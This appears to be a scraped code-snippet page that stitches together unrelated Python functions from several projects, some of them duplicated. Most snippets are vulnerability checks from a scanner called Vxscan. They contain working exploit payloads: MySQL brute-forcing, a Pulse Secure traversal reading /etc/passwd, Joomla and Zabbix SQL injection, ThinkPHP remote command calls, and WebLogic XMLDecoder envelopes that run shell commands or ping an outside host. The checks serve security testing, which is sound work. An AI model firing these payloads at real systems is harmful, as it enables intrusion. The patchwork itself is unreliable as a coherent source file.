파일: crack.py 프로젝트: yeqingchen1/Vxscan
 def pool(self, ip, ports):
     """Run the credential checks for every service found open on ``ip``.

     Each table entry pairs the (port, service-name) list handed to
     ``verify`` with the checker that probes that service. A truthy checker
     result is appended to ``self.result``; the accumulated list is returned.
     """
     service_checks = (
         (['3306', 'mysql'], mysql_check),
         (['22', 'SSH'], ssh_check),
         (['5432', 'PostgreSQL'], postgres_check),
     )
     for service, checker in service_checks:
         # verify() decides from the port list whether the service is present;
         # the third argument is always the empty-app marker here.
         if not verify(service, ports, ['']):
             continue
         finding = checker(ip)
         if finding:
             self.result.append(finding)
     return self.result
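    def post(self, request, pk):
        """ Submits a request to run a compendia page, WARNING: UNSAFE

        Runs the article's verification archive with the caller-supplied
        ``parameters`` and hands the outcome to ``save_verification``.
        ``pk`` identifies the article. Returns a ``Response``: 200 when no
        parameters were sent, the run's own status (default 201) on success,
        500 on any failure.

        Assumptions:

        The article exists. The article has an admin zipped code archive file that
        adheres to the convention. There is a main* in the zip file
        that dumps results to compendiaoutput/.

        Example responses:

        {
        "message": "ok",
        "output_files": [{"file": "file1", "bytes": 1024, "size": "1K"}],
        "stderr": "",
        "stdout": ""
        }

        {"message": "nothing to run"}
        {"message": "used default parameters"}
        {"message": "Compendia does not exist"}

        This message is a no-op.

        curl -v -X POST "http://hostname/api/v1/verification/2/"

        This message triggers an actual run even though the parameter data is empty.

        curl -v -X POST --data parameters="" "http://hostname/api/v1/verification/2/"

        """
        article = self.get_object(pk)

        # this is a stub.  For the purpose of a small demo, we will kick off
        # some jobs via curl to populate some results, and then leave the
        # website to get the existing results.
        if 'parameters' not in request.DATA:
            logger.debug("using default parameters %s", request.DATA)
            logger.debug("request keys %s", request.DATA.keys())
            return Response({"message": "Request was made with default parameters. Fetched cached results."},
                status=status.HTTP_200_OK)

        # `params` is taken verbatim from the request body and is therefore
        # untrusted input; verify.verify() must treat it as such (hence the
        # UNSAFE warning above).
        params = request.DATA['parameters']
        # Named `job` so it no longer shadows the incoming HTTP `request`.
        job = {
            'id': 'messageidnotusedyet',
            'compendia_id': pk,
            'path_to_target': article.verification_archive_file.path,
            'parameters': params,
        }
        try:
            results = verify.verify(job)
            save_verification(article, results)
            result_status = results.get('status', status.HTTP_201_CREATED)
            return Response(results, status=result_status)
        except Exception:
            # `except Exception` rather than a bare `except:` so that
            # KeyboardInterrupt / SystemExit still propagate instead of being
            # converted into a 500 response.
            # I don't have any customized exceptions yet just do this for now. apologies!
            logger.exception("evil badness from verify request")
            return Response({'message': 'We could not complete the verification request and' +
                ' the administrators have been notified'},
                status=status.HTTP_500_INTERNAL_SERVER_ERROR)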
def check(ip, ports, apps):
    """Fan the MySQL brute-force probe out over the hosts derived from ``ip``.

    Only runs when ``verify`` matches ``vuln`` against the open ports/apps.
    The module-level ``result`` is returned whether or not anything ran;
    presumably ``mysqlBruteforce`` writes into it (not visible here).
    """
    global result
    if not verify(vuln, ports, apps):
        return result
    targets = get_hosts(ip, user)
    with concurrent.futures.ThreadPoolExecutor(max_workers=40) as executor:
        # One task per host; an exception raised inside a worker stays in its
        # Future and is never surfaced here, exactly as with executor.map.
        for host in targets:
            executor.submit(mysqlBruteforce, host)
    return result
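def check(url, ip, ports, apps):
    """Report whether the FTP service on ``ip`` accepts an anonymous login.

    Returns the finding string on success, ``None`` otherwise. Connection and
    login failures are treated as "not vulnerable" and swallowed; the control
    connection is closed on every path.
    """
    if not verify(vuln, ports, apps):
        return None
    # A bounded timeout keeps one unresponsive host from stalling the scan.
    ftp = ftplib.FTP(timeout=5)
    try:
        ftp.connect(ip)
        ftp.login('anonymous', 'anonymous')
    except Exception:
        # Best-effort probe: refused, timed out or 530 all mean "no".
        return None
    finally:
        # close() is safe even when connect() never succeeded.
        ftp.close()
    return 'FTP anonymous Login'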
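def check(url, ip, ports, apps):
    """Detect an Apache Solr admin console exposed at ``url``/solr/.

    A hit requires HTTP 200 plus both 'Solr Admin' and 'Dashboard' in the
    response body. Returns the finding string or ``None``; request errors
    are swallowed (best-effort probe).
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    try:
        r = req.get(url + '/solr/')
        # `== 200`, not `is 200`: identity against an int literal only works
        # by accident of CPython's small-int cache and is a SyntaxWarning
        # from 3.8 on. Match on `.text` (str): if `.content` is bytes, as in
        # `requests`, `str in bytes` raises TypeError and the probe can
        # never fire.
        if r.status_code == 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text:
            return 'Apache Solr Admin leask'
    except Exception:
        pass
    return None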
def check(url, ip, ports, apps):
    """Probe ``url`` for CVE-2019-11510 (Pulse Connect Secure file read).

    The request counts as positive only when the response body carries the
    `root:x:0:0:root` marker. Returns the finding string or ``None``;
    transport and parsing errors are swallowed.
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    probe_path = r"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
    try:
        body = req.get(url + probe_path).text
        found = 'root:x:0:0:root' in body
    except Exception:
        return None
    return 'CVE-2019-11510 Pulse Connect Secure File | ' + url if found else None
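def check(ip, ports, apps):
    """Detect an Apache Solr admin console exposed at http://``ip``/solr/.

    A hit requires HTTP 200 plus both 'Solr Admin' and 'Dashboard' in the
    response body. Returns the finding string or ``None``; request errors
    are swallowed (best-effort probe).
    """
    if not verify(vuln, ports, apps):
        return None
    target = 'http://' + ip + '/solr/'
    try:
        # verify=False disables TLS certificate validation for any https hop
        # this request ends up making (e.g. via redirect).
        g = requests.get(target, headers=get_ua(), timeout=5, verify=False)
        # `== 200`, not `is 200` (identity against an int literal; SyntaxWarning
        # from 3.8). `.text` (str) instead of `.content` (bytes): `str in bytes`
        # raises TypeError, which the except below swallowed, so the probe
        # could never report a hit.
        if g.status_code == 200 and 'Solr Admin' in g.text and 'Dashboard' in g.text:
            return 'Apache Solr Admin leask'
    except Exception:
        pass
    return None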
def check(ip, ports, apps):
    """Probe ``ip`` for the Joomla 3.7.0 core SQL injection (com_fields).

    Positive when the response echoes the marker hash or an 'SQL error '
    string. Returns the finding string or ``None``; request errors are
    swallowed.
    """
    if not verify(vuln, ports, apps):
        return None
    base = 'http://' + ip
    probe = "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x3a,concat(1,(select%20md5(1))),1)"
    markers = ('c4ca4238a0b923820dcc509a6f75849b', 'SQL error ')
    try:
        body = requests.get(base + probe, timeout=5).text
        hit = any(marker in body for marker in markers)
    except Exception:
        return None
    return 'Joomla 3.7.0 Core SQL Injection: ' + base if hit else None
def check(ip, ports, apps):
    """Probe ``ip`` for the Zabbix jsrpc.php SQL injection.

    Positive when the response echoes the marker hash fragment or an
    'SQL error ' string. Returns the finding string or ``None``; request
    errors are swallowed.
    """
    if not verify(vuln, ports, apps):
        return None
    base = 'http://' + ip
    probe = "/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
    markers = ('ed733b8d10be225eceba344d533586', 'SQL error ')
    try:
        body = requests.get(base + probe, timeout=10).text
        hit = any(marker in body for marker in markers)
    except Exception:
        return None
    return 'zabbix jsrpc sqli:' + base if hit else None
def check(url, ip, ports, apps):
    """Probe ``url`` for the ThinkPHP 5 invokefunction RCE (variant 1).

    Positive when the response body contains phpinfo() output markers
    ('PHP Version' or 'PHP Extension Build'). Returns the finding string or
    ``None``; request errors are swallowed.
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    probe = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
    markers = ('PHP Version', 'PHP Extension Build')
    try:
        body = req.get(url + probe).text
        hit = any(marker in body for marker in markers)
    except Exception:
        return None
    return 'thinkphp5_rce_1 | ' + url if hit else None
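def check(ip, ports, apps):
    """Detect an unauthenticated ZooKeeper on ``ip``:2181.

    Sends a short probe and treats an 'Environment' token in the reply as a
    hit. Returns 'zookeeper://<ip>:2181' or ``None``; socket errors are
    swallowed and the socket is always closed.
    """
    if not verify(vuln, ports, apps):
        return None
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            # Per-socket timeout so a silent host cannot block the scan.
            s.settimeout(2)
            s.connect((ip, 2181))
            # Socket I/O is bytes on Python 3; sending a str raised TypeError
            # (swallowed below), which made the probe never fire.
            s.sendall(b'success')
            data = s.recv(1024)
    except Exception:
        return None
    if b'Environment' in data:
        return 'zookeeper://%s:2181' % ip
    return None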
def check(url, ip, ports, apps):
    """Check ``url`` for the Django < 2.0.8 open redirect (``//host`` path).

    Positive when the server answers with a redirect whose Location header
    points at www.example.com. Returns the finding string or ``None``;
    errors (including a missing Location header) are swallowed.
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    try:
        resp = req.get(url + "//www.example.com")
        redirected = resp.is_redirect and 'www.example.com' in resp.headers.get('Location')
    except Exception:
        return None
    return 'Django < 2.0.8 任意URL跳转漏洞' if redirected else None
def check(url, ip, ports, apps):
    """Probe ``url`` for the ThinkPHP 5.0.23 captcha-route RCE.

    Posts a form body carrying the module-level ``random_num`` and treats
    its echo in the response as a hit. Returns the finding string or
    ``None``; request errors are swallowed.
    """
    req = Requests()
    if not verify(vuln, ports, apps):
        return None
    form_body = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num)
    form_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    try:
        resp = req.request(url + '/index.php?s=captcha', 'post', data=form_body, headers=form_headers)
        echoed = random_num in resp.text
    except Exception:
        return None
    return 'thinkphp_5_0_23_rce | ' + url if echoed else None
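def check(ip, ports, apps):
    """Detect a MongoDB on ``ip``:27017 that lists databases without auth.

    Returns the finding string when ``list_database_names()`` yields a
    non-empty list, ``None`` otherwise. Errors are swallowed; the client is
    closed on every path (previously it leaked on the exception path).
    """
    if not verify(vuln, ports, apps):
        return None
    conn = None
    try:
        conn = pymongo.MongoClient(host=ip, port=27017, serverSelectionTimeoutMS=timeout)
        database_list = conn.list_database_names()
    except Exception:
        return None
    finally:
        if conn is not None:
            conn.close()
    if database_list:
        return '27017 MongoDB Unauthorized Access'
    return None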
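def check(url, ip, ports, apps):
    """Detect an unauthenticated ZooKeeper on ``ip``:2181.

    Sends a short probe and treats b'Environment' in the reply as a hit.
    Returns the finding string or ``None``; socket errors are swallowed and
    the socket is always closed.
    """
    if not verify(vuln, ports, apps):
        return None
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            # Timeout on this socket only; socket.setdefaulttimeout() would
            # silently change every socket created later in the process.
            s.settimeout(2)
            s.connect((ip, 2181))
            s.sendall(b'success')
            data = s.recv(1024)
    except Exception:
        return None
    if b'Environment' in data:
        return '2181 Zookeeper Unauthorized access'
    return None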
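def check(ip, ports, apps):
    """Detect an unauthenticated Docker Remote API on ``ip``:2375.

    Issues GET /containers/json and treats a 200 reply that also carries
    'Docker' and 'Api-Version' as a hit. Returns the finding string or
    ``None``; socket errors are swallowed and the socket is always closed.
    """
    if not verify(vuln, ports, apps):
        return None
    # Socket I/O is bytes on Python 3; sending a str raised TypeError (then
    # swallowed), so the probe could never fire.
    http_request = ("GET /containers/json HTTP/1.1\r\nHost: %s:%s\r\n\r\n" %
                    (ip, 2375)).encode()
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            # Per-socket timeout instead of socket.setdefaulttimeout(), which
            # changed the default for every socket in the process.
            s.settimeout(2)
            s.connect((ip, 2375))
            s.sendall(http_request)
            reply = s.recv(1024)
    except Exception:
        return None
    if b"HTTP/1.1 200 OK" in reply and b'Docker' in reply and b'Api-Version' in reply:
        return '2375 Docker unauthorized success'
    return None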
def check(ip, ports, apps):
    """Detect a Redis on ``ip``:6379 that answers INFO without auth.

    The payload is the RESP encoding of `info`; a reply containing
    `redis_version` is a hit. Returns the finding string or ``None``;
    socket errors are swallowed and the socket is closed either way.
    """
    if not verify(vuln, ports, apps):
        return None
    info_cmd = b'\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(5)
        try:
            s.connect((ip, 6379))
            s.send(info_cmd)
            reply = s.recv(1024)
        except Exception:
            return None
    return '6379 Redis Unauthorized Access' if b"redis_version" in reply else None
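def check(ip, ports, apps):
    """Detect an unauthenticated memcached on ``ip``:11211.

    Sends the `stats` command and treats a reply containing 'STAT version'
    as a hit. Returns the finding string or ``None``. Failures are printed
    (best-effort probe) and the socket is closed on every path.
    """
    if not verify(vuln, ports, apps):
        return None
    port = 11211
    payload = b'\x73\x74\x61\x74\x73\x0a'  # command:stats
    try:
        with socket.socket() as s:
            # settimeout() on the socket itself: setdefaulttimeout() only
            # applies to sockets created *after* the call, so calling it after
            # socket.socket() left this connect/recv unbounded.
            s.settimeout(5)
            s.connect((ip, port))
            s.sendall(payload)
            recvdata = s.recv(2048)  # response larger than 1024
    except Exception as e:
        print(e)
        return None
    if recvdata and (b'STAT version' in recvdata):
        return '11211 Memcache Unauthorized Access'
    return None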
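def check(ip, ports, apps):
    """Detect an rsync daemon on ``ip``:873 that lists modules without auth.

    Sends the protocol greeting, answers the daemon's greeting with a bare
    newline, and treats any non-empty module listing as a hit. Returns the
    finding string or ``None``; errors are swallowed and the socket is
    always closed.
    """
    if not verify(vuln, ports, apps):
        return None
    payload = b"\x40\x52\x53\x59\x4e\x43\x44\x3a\x20\x33\x31\x2e\x30\x0a"  # "@RSYNCD: 31.0\n"
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            # Per-socket timeout instead of mutating the process-wide default.
            sock.settimeout(timeout)
            sock.connect((ip, 873))
            sock.sendall(payload)
            initinfo = sock.recv(400)
            # The greeting is bytes; comparing it with a str raised TypeError
            # (swallowed), so the newline was never sent and the probe could
            # not fire.
            if b"RSYNCD" in initinfo:
                sock.sendall(b"\x0a")
            modulelist = sock.recv(200)
    except Exception:
        return None
    if modulelist:
        return '873 Rsync Unauthorized Access'
    return None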
def check(url, ip, ports, apps):
    """Probe ``ip``:7001 for CVE-2017-10271 (WebLogic wls-wsat XMLDecoder).

    Posts a WorkContext envelope and treats a faultstring naming
    java.lang.ProcessBuilder (or the "0" fault) as a hit. Returns the finding
    string or ``None``; transport errors are treated as an empty body.
    """
    if not verify(vuln, ports, apps):
        return None
    headers = get_ua()
    headers.update({'Content-Type': 'text/xml'})
    endpoint = 'http://{}:7001/wls-wsat/CoordinatorPortType'.format(ip)
    envelope = '''
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                <java>
                    <object class="java.lang.ProcessBuilder">
                        <array class="java.lang.String" length="3">
                            <void index="0">
                                <string>/bin/sh</string>
                            </void>
                            <void index="1">
                                <string>-c</string>
                            </void>
                            <void index="2">
                                <string>echo xss</string>
                            </void>
                        </array>
                        <void method="start"/>
                    </object>
                </java>
            </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body/>
        </soapenv:Envelope>
            '''

    try:
        body = requests.post(endpoint,
                             data=envelope,
                             verify=False,
                             timeout=5,
                             headers=headers).text
    except Exception:
        body = ""

    fault_markers = ('<faultstring>java.lang.ProcessBuilder', "<faultstring>0")
    if any(marker in body for marker in fault_markers):
        return 'CVE-2017-10271 Weglogic RCE {}'.format(endpoint)
    return None
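def check(ip, ports, apps):
    """Probe ``ip`` for the WebLogic wls-wsat XMLDecoder deserialization flaw.

    Posts a WorkContext envelope to /wls-wsat/CoordinatorPortType and treats
    a faultstring naming java.lang.ProcessBuilder (or the "0" fault) as a
    hit. Returns the finding string or ``None``; transport or regex failures
    are treated as an empty faultstring. Uses the module-level ``HEADERS``.
    """
    if not verify(vuln, ports, apps):
        return None
    # `url` used to be assigned only when ip lacked a scheme, so an
    # "http..." ip raised NameError on the next line; both forms now yield a
    # base URL. The old `if "/" in url` guard was always true for
    # "http://..." and is dropped.
    url = ip if ip.startswith("http") else "http://" + ip
    url += '/wls-wsat/CoordinatorPortType'
    post_str = '''
            <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
              <soapenv:Header>
                <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                  <java>
                    <void class="java.lang.ProcessBuilder">
                      <array class="java.lang.String" length="2">
                        <void index="0">
                          <string>/usr/sbin/ping</string>
                        </void>
                        <void index="1">
                          <string>ceye.com</string>
                        </void>
                      </array>
                      <void method="start"/>
                    </void>
                  </java>
                </work:WorkContext>
              </soapenv:Header>
              <soapenv:Body/>
            </soapenv:Envelope>
            '''

    try:
        response = requests.post(url,
                                 data=post_str,
                                 verify=False,
                                 timeout=5,
                                 headers=HEADERS)
        match = re.search(r"\<faultstring\>.*\<\/faultstring\>", response.text)
        # No faultstring in the reply is simply "no hit", not an error.
        faultstring = match.group(0) if match else ""
    except Exception:
        faultstring = ""

    if '<faultstring>java.lang.ProcessBuilder' in faultstring or "<faultstring>0" in faultstring:
        return '[+]weblogic has a JAVA deserialization vulnerability'
    return None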
파일: parse.py 프로젝트: sycured/pypaseto
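def parse(
        key,
        purpose: str,
        token: bytes,
        encoder=JsonEncoder,
        validate: bool = True,
        rules=None,
        required_claims=None
):
    """
    Parse a paseto token.
    Takes a key, a purpose (which must be either 'local' or 'public'), and
    a `token`, which must be a bytes object.

    By default, it validates known registered claims (currently just 'exp').
    To disable validation, set "validate" to False. Cryptographic validity
    cannot be turned off (decryption and authentication are still performed).

    You can also turn on/off validation of specific rules by passing a list to
    "rules". If you pass an empty list to "rules", you must also specify
    "validate=False" or it will raise an exception.

    You may pass an alternative encoder if you don't want to use JSON. It
    should have loads/dumps methods available, and output a bytes object (not
    a str).
    :param key: decryption/validation key. Must match the purpose type
    :param purpose: one of 'local', 'public'
    :param token: bytes object with the raw paseto token
    :param encoder: optional encoder to use instead of JSON
    :param validate: bool indicating if claims should be validated with rules
    :param rules: list of rule names to apply to override the default rules
    :param required_claims: list of claim names that must be present (like exp)
    :return: dict with the decoded 'message' and 'footer' (None when the
        token has no footer)
    :raises ValueError: bad purpose, missing key, unknown rule names, empty
        rules with validate=True, or an expired token
    """
    if purpose not in {'local', 'public'}:
        raise ValueError(inv_purp)
    if not key:
        raise ValueError('key is required')
    # Cryptographic checks always run: 'local' decrypts and authenticates,
    # 'public' verifies the signature. Only claim validation is optional.
    result = decrypt(token, key) if purpose == 'local' else verify(token, key)
    decoded_message = encoder.loads(result['message'])
    decoded_footer = encoder.loads(result['footer']) if result[
        'footer'] else None

    check_claims(set(decoded_message.keys()), required_claims)

    # `is None`, not `not rules`: an explicit empty list means "no rules"
    # and must be paired with validate=False as documented above. Testing
    # truthiness silently replaced [] with DEFAULT_RULES, so the check
    # below could never trigger.
    rules = DEFAULT_RULES if rules is None else set(rules)
    if validate and not rules:
        raise ValueError('must set validate=False to use no rules')

    rule_set = {'exp'}
    unknown_rules = rules.difference(rule_set)
    if unknown_rules:
        raise ValueError(f'unknown rules: {unknown_rules}')

    if validate and 'exp' in rules and 'exp' in decoded_message:
        # validate expiration: a token past its 'exp' is rejected even though
        # it decrypted/verified correctly.
        exp = decoded_message['exp']
        when = pparse(exp)
        if now() > when:
            raise ValueError('token expired')
    return {'message': decoded_message, 'footer': decoded_footer}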
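    def post(self, request, pk):
        """ Submits a request to run a compendia page, WARNING: UNSAFE

        Runs the article's verification archive with the caller-supplied
        ``parameters`` and hands the outcome to ``save_verification``.
        ``pk`` identifies the article. Returns a ``Response``: 200 when no
        parameters were sent, the run's own status (default 201) on success,
        500 on any failure.

        Assumptions:

        The article exists. The article has an admin zipped code archive file that
        adheres to the convention. There is a main* in the zip file
        that dumps results to compendiaoutput/.

        Example responses:

        {
        "message": "ok",
        "output_files": [{"file": "file1", "bytes": 1024, "size": "1K"}],
        "stderr": "",
        "stdout": ""
        }

        {"message": "nothing to run"}
        {"message": "used default parameters"}
        {"message": "Compendia does not exist"}

        This message is a no-op.

        curl -v -X POST "http://hostname/api/v1/verification/2/"

        This message triggers an actual run even though the parameter data is empty.

        curl -v -X POST --data parameters="" "http://hostname/api/v1/verification/2/"

        """
        article = self.get_object(pk)

        # this is a stub.  For the purpose of a small demo, we will kick off
        # some jobs via curl to populate some results, and then leave the
        # website to get the existing results.
        if 'parameters' not in request.DATA:
            logger.debug("using default parameters %s", request.DATA)
            logger.debug("request keys %s", request.DATA.keys())
            return Response(
                {
                    "message":
                    "Request was made with default parameters. Fetched cached results."
                },
                status=status.HTTP_200_OK)

        # `params` is taken verbatim from the request body and is therefore
        # untrusted input; verify.verify() must treat it as such (hence the
        # UNSAFE warning above).
        params = request.DATA['parameters']
        # Named `job` so it no longer shadows the incoming HTTP `request`.
        job = {
            'id': 'messageidnotusedyet',
            'compendia_id': pk,
            'path_to_target': article.verification_archive_file.path,
            'parameters': params,
        }
        try:
            results = verify.verify(job)
            save_verification(article, results)
            result_status = results.get('status', status.HTTP_201_CREATED)
            return Response(results, status=result_status)
        except Exception:
            # `except Exception` rather than a bare `except:` so that
            # KeyboardInterrupt / SystemExit still propagate instead of being
            # converted into a 500 response.
            # I don't have any customized exceptions yet just do this for now. apologies!
            logger.exception("evil badness from verify request")
            return Response(
                {
                    'message':
                    'We could not complete the verification request and' +
                    ' the administrators have been notified'
                },
                status=status.HTTP_500_INTERNAL_SERVER_ERROR)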
def check(url, ip, ports, apps):
    """Query the Solr config endpoint on ``ip``:8983 and report its finding.

    Delegates to ``query_config``; whatever truthy value it returns is passed
    straight back, otherwise ``None``.
    """
    if not verify(vuln, ports, apps):
        return None
    finding = query_config('http://{}:8983'.format(ip))
    return finding if finding else None